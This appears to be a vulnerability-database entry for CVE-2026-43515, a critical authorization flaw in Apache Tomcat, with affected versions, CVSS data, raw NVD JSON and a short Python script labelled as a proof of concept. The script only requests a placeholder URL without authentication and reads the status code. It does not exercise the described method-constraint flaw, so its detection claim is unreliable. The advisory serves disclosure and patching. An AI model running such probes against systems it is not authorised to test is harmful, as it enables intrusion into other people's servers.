Security Vulnerability Report
中文
CVE-2026-43515 CVSS 9.1 CRITICAL

CVE-2026-43515

Published: 2026-05-12 16:16:19
Last Modified: 2026-05-14 20:17:06
Source: [email protected]

Description

Improper Authorization vulnerability when multiple method constraints define an HTTP method for the same extension in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.21, from 10.1.0-M1 through 10.1.54, from 9.0.0.M1 through 9.0.117, from 8.5.0 through 8.5.100, from 7.0.0 through 7.0.109. Users are recommended to upgrade to version 11.0.22, 10.1.55 or 9.0.118 which fix the issue.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Apache Tomcat 11.0.0-M1 至 11.0.21
Apache Tomcat 10.1.0-M1 至 10.1.54
Apache Tomcat 9.0.0.M1 至 9.0.117
Apache Tomcat 8.5.0 至 8.5.100
Apache Tomcat 7.0.0 至 7.0.109

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2026-43515 # Description: This script checks if a protected resource can be accessed # due to the improper authorization handling with multiple method constraints. target_url = "http://target-vulnerable-tomcat.com/protected/resource.jsp" headers = { "User-Agent": "CVE-2026-43515-Test" } print(f"[*] Attempting to access: {target_url}") try: # Send a request without authentication cookies response = requests.get(target_url, headers=headers, timeout=10) if response.status_code == 200: print("[+] Potential Vulnerability Detected!") print("[+] Received 200 OK without authentication.") print(f"[+] Response Content Length: {len(response.text)}") elif response.status_code == 401 or response.status_code == 403: print("[-] Access Denied. System might be patched or not vulnerable.") else: print(f"[?] Received status code: {response.status_code}") except Exception as e: print(f"[!] Error during request: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43515", "sourceIdentifier": "[email protected]", "published": "2026-05-12T16:16:18.553", "lastModified": "2026-05-14T20:17:05.887", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Authorization vulnerability when multiple method constraints define an HTTP method for the same extension in Apache Tomcat.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.21, from 10.1.0-M1 through 10.1.54, from 9.0.0.M1 through 9.0.117, from 8.5.0 through 8.5.100, from 7.0.0 through 7.0.109.\n\nUsers are recommended to upgrade to version 11.0.22, 10.1.55 or 9.0.118 which fix the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://lists.apache.org/thread/746nxfxod0wsocxtmv8pb8nkgmwpc6bb", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/12/11", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.